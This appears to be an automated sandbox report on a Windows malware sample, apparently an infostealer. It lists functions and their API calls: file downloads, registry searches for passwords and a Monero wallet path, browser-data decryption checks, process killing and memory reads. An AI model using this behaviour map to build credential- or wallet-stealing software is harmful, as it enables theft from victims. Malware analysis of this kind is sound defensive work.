Instruction Fuzzy Hash: D2417EB1B00215ABDB20DF64DC49FAE77B9AB44704F104569FA05F72C0DBB4AA418BA8

Function 02476C77 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 02476CA6
InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 02476CD3
StrCmpCA.SHLWAPI(?,00638C80), ref: 02476CF1
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 02476D11
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02476D2F
InternetReadFile.WININET(00000000,?,00000400,?), ref: 02476D48
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02476D6D
InternetReadFile.WININET(00000000,?,00000400,?), ref: 02476D97
CloseHandle.KERNEL32(00000000), ref: 02476DB7
InternetCloseHandle.WININET(00000000), ref: 02476DBE
InternetCloseHandle.WININET(?), ref: 02476DC8

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
String ID:
API String ID: 2500263513-0
Opcode ID: cc38f937b6d9044345b358c1caff838f268f9b3664d4dee0a204f6f11099f684
Instruction ID: 79f049548168fa0aa0553962d3a975cf37eb030951716a4350003bf01345ded3
Opcode Fuzzy Hash: cc38f937b6d9044345b358c1caff838f268f9b3664d4dee0a204f6f11099f684
Instruction Fuzzy Hash: 41418CB1A10615AFDB20DF65DC45FEE77BAAB44704F004459FA14E7280DF70AA408BA4

Function 02494A67 Relevance: 16.5, APIs: 11, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(0043573C,?,024879A8), ref: 02494A6D
GetProcAddress.KERNEL32(00000000,00435748), ref: 02494A83
GetProcAddress.KERNEL32(00000000,00435750), ref: 02494A94
GetProcAddress.KERNEL32(00000000,0043575C), ref: 02494AA5
GetProcAddress.KERNEL32(00000000,00435768), ref: 02494AB6
GetProcAddress.KERNEL32(00000000,00435770), ref: 02494AC7
GetProcAddress.KERNEL32(00000000,0043577C), ref: 02494AD8
GetProcAddress.KERNEL32(00000000,00435784), ref: 02494AE9
GetProcAddress.KERNEL32(00000000,0043578C), ref: 02494AFA
GetProcAddress.KERNEL32(00000000,0043579C), ref: 02494B0B
GetProcAddress.KERNEL32(00000000,004357A8), ref: 02494B1C

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: f2223fcb320c708e67ee859b9f5f9b1d6605f49617afa15cb912c6ce6d96c9dc
Instruction ID: dfbad0a71744f6d0907d508bd128d8e71d5591818f5b4c8ef24ec0200a62f86b
Opcode Fuzzy Hash: f2223fcb320c708e67ee859b9f5f9b1d6605f49617afa15cb912c6ce6d96c9dc
Instruction Fuzzy Hash: 4C117876951720EF8714AFB5AD4DA9A3ABABA0E70AB14381BF151D3160DBF84004DFE4

Function 004180E0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00418105
lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042093B), ref: 0041814B
lstrcpy.KERNEL32(00000000,00000000), ref: 0041817A
StrCmpCA.SHLWAPI(00000000,00435204,?,?,?,?,?,0042093B), ref: 00418192
lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042093B), ref: 004181D0
lstrcpy.KERNEL32(00000000,00000000), ref: 004181FF
strtok_s.MSVCRT ref: 0041820F

Strings

;B, xrefs: 004180F1, 00418209, 004180FB, 0041820C
fplugins, xrefs: 004180E6

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlenstrtok_s
String ID: ;B$fplugins
API String ID: 3280532728-1193078497
Opcode ID: 713ed03d311a4750fa88e0bed59657df25361087ac739758ea01ec1891f1f295
Instruction ID: 7bc27923b6a5a417a1ea9fc553f6de9f23466f0c50f763b4e3e6f257422fb611
Opcode Fuzzy Hash: 713ed03d311a4750fa88e0bed59657df25361087ac739758ea01ec1891f1f295
Instruction Fuzzy Hash: 2741A275600206AFCB21DF68D948BABBBF4EF44700F11415EE855E7254EF78D981CB94

Function 004079A0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 109stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00407710: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407745
Part of subcall function 00407710: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040778A
Part of subcall function 00407710: strlen.MSVCRT ref: 004077BE
Part of subcall function 00407710: StrStrA.SHLWAPI(?,Password), ref: 004077F8
Part of subcall function 00407710: strcpy_s.MSVCRT ref: 00407821
Part of subcall function 00407710: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040782C
Part of subcall function 00407710: HeapFree.KERNEL32(00000000), ref: 00407833
Part of subcall function 00407710: strlen.MSVCRT ref: 00407840

lstrcatA.KERNEL32(00000000,0043509C), ref: 004079D0
lstrcatA.KERNEL32(00000000,?), ref: 004079FD
lstrcatA.KERNEL32(00000000, : ), ref: 00407A0F
lstrcatA.KERNEL32(00000000,?), ref: 00407A30
wsprintfA.USER32 ref: 00407A50
lstrcpy.KERNEL32(00000000,?), ref: 00407A79
lstrcatA.KERNEL32(00000000,00000000), ref: 00407A87
lstrcatA.KERNEL32(00000000,0043509C), ref: 00407AA0

Strings

: , xrefs: 00407A09

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
String ID: :
API String ID: 2460923012-3653984579
Opcode ID: f031ef58faa457096bf95d298a055532e700362941ca8dcdb5c710b34acc3087
Instruction ID: 0800d7a34e1c09264d13db2801d63b4130211ebfed734ffac9e47d0e74890df3
Opcode Fuzzy Hash: f031ef58faa457096bf95d298a055532e700362941ca8dcdb5c710b34acc3087
Instruction Fuzzy Hash: 51318672E04214AFCB14DB68DC449AFB77ABB84310B14552AF606A3350DB79B941CFE5

Function 0247BF50 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 0247BF76
lstrlen.KERNEL32(00000000), ref: 0247BFA9
lstrcpy.KERNEL32(00000000,00000000), ref: 0247BFD3
lstrcat.KERNEL32(00000000,00000000), ref: 0247BFDB
lstrcpy.KERNEL32(00000000,00000000), ref: 0247C003
lstrlen.KERNEL32(0043509C), ref: 0247C07A

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 429597e02848e73d099179173949805f0ac9f6d10f8d92198f539ea29d3a57b6
Instruction ID: 8023a5fd3aea74d9755ab5bb9d6331894cdcb9dd438b7636fdc761d49496f8ad
Opcode Fuzzy Hash: 429597e02848e73d099179173949805f0ac9f6d10f8d92198f539ea29d3a57b6
Instruction Fuzzy Hash: AEA15B70A01245CFCB24DF69C988AEEB7F6AF44309F14846BE8299B361DB75D841CF90

Function 0248C7FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 136stringCOMMON

Download Yara Rule

APIs

Part of subcall function 024975A7: lstrlen.KERNEL32(------,02475D82), ref: 024975B2
Part of subcall function 024975A7: lstrcpy.KERNEL32(00000000), ref: 024975D6
Part of subcall function 024975A7: lstrcat.KERNEL32(?,------), ref: 024975E0

Part of subcall function 02497517: lstrcpy.KERNEL32(00000000), ref: 02497545

Part of subcall function 02497557: lstrcpy.KERNEL32(00000000), ref: 02497586
Part of subcall function 02497557: lstrcat.KERNEL32(00000000), ref: 02497592

lstrcpy.KERNEL32(00000000,?), ref: 0248C8F2
lstrcpy.KERNEL32(00000000,?), ref: 0248C91B
ShellExecuteEx.SHELL32(0000003C), ref: 0248C97B

Strings

(QC, xrefs: 0248C866
<, xrefs: 0248C93B
.dll, xrefs: 0248C7FC
XTC, xrefs: 0248C823
\TC, xrefs: 0248C968

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: (QC$.dll$<$XTC$\TC
API String ID: 3031569214-1251744519
Opcode ID: 78a51166efe7744123a507f86fef9074274627cecf28876ae91ec9f88b78fd30
Instruction ID: 8ff5f6c7fe52e62ba0ea06d8421d5a3de3b01de6636d31526803c7bc32a1a0b2
Opcode Fuzzy Hash: 78a51166efe7744123a507f86fef9074274627cecf28876ae91ec9f88b78fd30
Instruction Fuzzy Hash: 92515B719202998BCB54FF79C88098DBBB2AF44319F1548BED859AB610DB34DD46CF40

Function 00409E40 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 182memorystringCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,v20,00000003), ref: 00409E64
memcmp.MSVCRT(?,v10,00000003), ref: 00409EA2
memset.MSVCRT ref: 00409ECF
LocalAlloc.KERNEL32(00000040), ref: 00409F07

Part of subcall function 00427210: lstrcpy.KERNEL32(00000000,ERROR), ref: 0042722E

lstrcpy.KERNEL32(00000000,0043520C), ref: 0040A012

Strings

v10, xrefs: 00409E9C
@, xrefs: 00409EE8
v20, xrefs: 00409E5E

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpymemcmp$AllocLocalmemset
String ID: @$v10$v20
API String ID: 3420379846-278772428
Opcode ID: 330cae58e6688a2e98774f110046c80a2aac67dd83a01ba16a53f72088a13564
Instruction ID: 83ac3224cdaa42a2a44bfc4cbeb411fde6a44a78649a1401cb5d7513f19e7b50
Opcode Fuzzy Hash: 330cae58e6688a2e98774f110046c80a2aac67dd83a01ba16a53f72088a13564
Instruction Fuzzy Hash: F9519D71A002199BDB10EF65DC45B9F77A4AF04318F14407AF949BB2D2DBB8ED058BD8

Function 0248E3D0 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0248E3F6
lstrcat.KERNEL32(?,00000000), ref: 0248E404
lstrcat.KERNEL32(?,?), ref: 0248E41F
lstrcat.KERNEL32(?,?), ref: 0248E433
lstrcat.KERNEL32(?,00638A84), ref: 0248E447
lstrcat.KERNEL32(?,?), ref: 0248E45B
lstrcat.KERNEL32(?,00638AC8), ref: 0248E46E
lstrcpy.KERNEL32(00000000,?), ref: 0248E4A6
GetFileAttributesA.KERNEL32(00000000), ref: 0248E4AD

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$AttributesFile
String ID:
API String ID: 3428472996-0
Opcode ID: 55c52c1f62f8efd274b96c816be001393c03f7b4ce265de6d3a978105c0cffea
Instruction ID: 6415f750d726db7696c73129a51235720f318165935faaf3ebc9bbb504bb136f
Opcode Fuzzy Hash: 55c52c1f62f8efd274b96c816be001393c03f7b4ce265de6d3a978105c0cffea
Instruction Fuzzy Hash: 67418EB1910128DBCB24EF74CC48ADE77B6AF48300F1089AAF95993250DBB49F85DF90

Function 0248C642 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 145stringCOMMON

Download Yara Rule

APIs

Part of subcall function 024975A7: lstrlen.KERNEL32(------,02475D82), ref: 024975B2
Part of subcall function 024975A7: lstrcpy.KERNEL32(00000000), ref: 024975D6
Part of subcall function 024975A7: lstrcat.KERNEL32(?,------), ref: 024975E0

Part of subcall function 02497517: lstrcpy.KERNEL32(00000000), ref: 02497545

Part of subcall function 02497557: lstrcpy.KERNEL32(00000000), ref: 02497586
Part of subcall function 02497557: lstrcat.KERNEL32(00000000), ref: 02497592

lstrcpy.KERNEL32(00000000,?), ref: 0248C736
lstrcpy.KERNEL32(00000000,?), ref: 0248C75F
ShellExecuteEx.SHELL32(0000003C), ref: 0248C7CB

Strings

(QC, xrefs: 0248C6F0
(QC, xrefs: 0248C6B0
<, xrefs: 0248C77F
"" , xrefs: 0248C68C

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: "" $(QC$(QC$<
API String ID: 3031569214-2404812987
Opcode ID: 8cc24b7e80201b832584fbae0ea064460c96b0f159e9a026d4ea583a74e4237f
Instruction ID: 6daf941faea9c6402fbd7ff47f5d05d63418979eff495cac44e81bbc9fd1f200
Opcode Fuzzy Hash: 8cc24b7e80201b832584fbae0ea064460c96b0f159e9a026d4ea583a74e4237f
Instruction Fuzzy Hash: B7512A729202998BCB14FF79D88099DBBB2AF84318F25487FD815AB611DB349D46CF90

Function 00401000 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401015
HeapAlloc.KERNEL32(00000000), ref: 0040101C
RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401039
RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401053
RegCloseKey.ADVAPI32(?), ref: 0040105D

Strings

SOFTWARE\monero-project\monero-core, xrefs: 0040102F
wallet_path, xrefs: 0040104D

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: SOFTWARE\monero-project\monero-core$wallet_path
API String ID: 3466090806-4244082812
Opcode ID: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
Instruction ID: 56cdd2726f40904dd9986b82161546f6f5fb1bd65c94bb362b351e19f11762fa
Opcode Fuzzy Hash: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
Instruction Fuzzy Hash: B2F09075A40308BFD7049BA09C4DFEB7B7DEB04715F100059FE05E2290D7B45A448BE0

Function 02479357 Relevance: 12.2, APIs: 8, Instructions: 161networkfilestringCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 02479376
InternetOpenUrlA.WININET(00000000,004350EC,00000000,00000000,80000000,00000000), ref: 02479393
InternetCloseHandle.WININET(00000000), ref: 024793A0

Part of subcall function 02488117: memchr.MSVCRT ref: 02488156
Part of subcall function 02488117: memcmp.MSVCRT(00000000,?,?,?,00435108,00000000), ref: 02488170
Part of subcall function 02488117: memchr.MSVCRT ref: 0248818F

Part of subcall function 02478C17: std::_Xinvalid_argument.LIBCPMT ref: 02478C2D

strlen.MSVCRT ref: 024793BC
InternetReadFile.WININET(?,?,?,00000000), ref: 024793FD
InternetReadFile.WININET(00000000,?,00001000,?), ref: 0247942E
InternetCloseHandle.WININET(00000000), ref: 02479439
InternetCloseHandle.WININET(00000000), ref: 02479440

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_strlen
String ID:
API String ID: 1093921401-0
Opcode ID: 2df68befe2a48d953af9806ad3ef1aaa75e141ea7b2b3915444889022231d2c0
Instruction ID: b0676c230008e923b877d40cdfa2fa749e915eb47c99956160b0f5dd61a3b99b
Opcode Fuzzy Hash: 2df68befe2a48d953af9806ad3ef1aaa75e141ea7b2b3915444889022231d2c0
Instruction Fuzzy Hash: AD51E371A00204ABDB20DFA8DC44BEEF7F9EB48714F14152AF505E3380DBB4EA459BA5

Function 00424760 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00424779
Process32First.KERNEL32(00000000,00000128), ref: 00424789
Process32Next.KERNEL32(00000000,00000128), ref: 0042479B
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004247BC
TerminateProcess.KERNEL32(00000000,00000000), ref: 004247CB
CloseHandle.KERNEL32(00000000), ref: 004247D2
Process32Next.KERNEL32(00000000,00000128), ref: 004247E0
CloseHandle.KERNEL32(00000000), ref: 004247EB

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 3836391474-0
Opcode ID: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
Instruction ID: 367f00e3fac1ad323777d3cfb6a9c31bedb6582ea87d99118442d47bc1b8c7be
Opcode Fuzzy Hash: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
Instruction Fuzzy Hash: 65019271701224AFE7215B30ACC9FEB777DEB88751F00119AF905D2290EFB48D908AA4

Function 0247E756 Relevance: 10.9, APIs: 7, Instructions: 442stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0247EB2A
lstrcpy.KERNEL32(00000000,?), ref: 0247EB5C
lstrcpy.KERNEL32(00000000,?), ref: 0247EBAB
lstrcpy.KERNEL32(00000000,?), ref: 0247EBD1
lstrcpy.KERNEL32(00000000,?), ref: 0247EC09
FindNextFileA.KERNEL32(00000000,?), ref: 0247EC3F
FindClose.KERNEL32(00000000), ref: 0247EC4E

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$CloseFileNext
String ID:
API String ID: 1875835556-0
Opcode ID: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction ID: 3fb55458fc713f528b08dff0a58e3d20cd42c418368aaf4598fb8b62cdcc4768
Opcode Fuzzy Hash: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction Fuzzy Hash: 4702E974B012118FDB28CF29C588BA6B7E5AF44718F19C6EED8199B3A1D772D842CF50

Function 0247E7DB Relevance: 10.9, APIs: 7, Instructions: 442stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0247EB2A
lstrcpy.KERNEL32(00000000,?), ref: 0247EB5C
lstrcpy.KERNEL32(00000000,?), ref: 0247EBAB
lstrcpy.KERNEL32(00000000,?), ref: 0247EBD1
lstrcpy.KERNEL32(00000000,?), ref: 0247EC09
FindNextFileA.KERNEL32(00000000,?), ref: 0247EC3F
FindClose.KERNEL32(00000000), ref: 0247EC4E

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$CloseFileNext
String ID:
API String ID: 1875835556-0
Opcode ID: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction ID: 3fb55458fc713f528b08dff0a58e3d20cd42c418368aaf4598fb8b62cdcc4768
Opcode Fuzzy Hash: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction Fuzzy Hash: 4702E974B012118FDB28CF29C588BA6B7E5AF44718F19C6EED8199B3A1D772D842CF50

Function 0247E7FC Relevance: 10.9, APIs: 7, Instructions: 442stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0247EB2A
lstrcpy.KERNEL32(00000000,?), ref: 0247EB5C
lstrcpy.KERNEL32(00000000,?), ref: 0247EBAB
lstrcpy.KERNEL32(00000000,?), ref: 0247EBD1
lstrcpy.KERNEL32(00000000,?), ref: 0247EC09
FindNextFileA.KERNEL32(00000000,?), ref: 0247EC3F
FindClose.KERNEL32(00000000), ref: 0247EC4E

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$CloseFileNext
String ID:
API String ID: 1875835556-0
Opcode ID: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction ID: 3fb55458fc713f528b08dff0a58e3d20cd42c418368aaf4598fb8b62cdcc4768
Opcode Fuzzy Hash: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction Fuzzy Hash: 4702E974B012118FDB28CF29C588BA6B7E5AF44718F19C6EED8199B3A1D772D842CF50

Function 02492377 Relevance: 10.7, APIs: 7, Instructions: 224stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0249238A
??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,02492686,00000000,00000000,00000000), ref: 024923B8
VirtualQueryEx.KERNEL32(00000000,00000000,?,0000001C), ref: 02492408
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00064000,00000000), ref: 02492469

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: MemoryProcessQueryReadVirtualstrlen
String ID:
API String ID: 3366127311-0
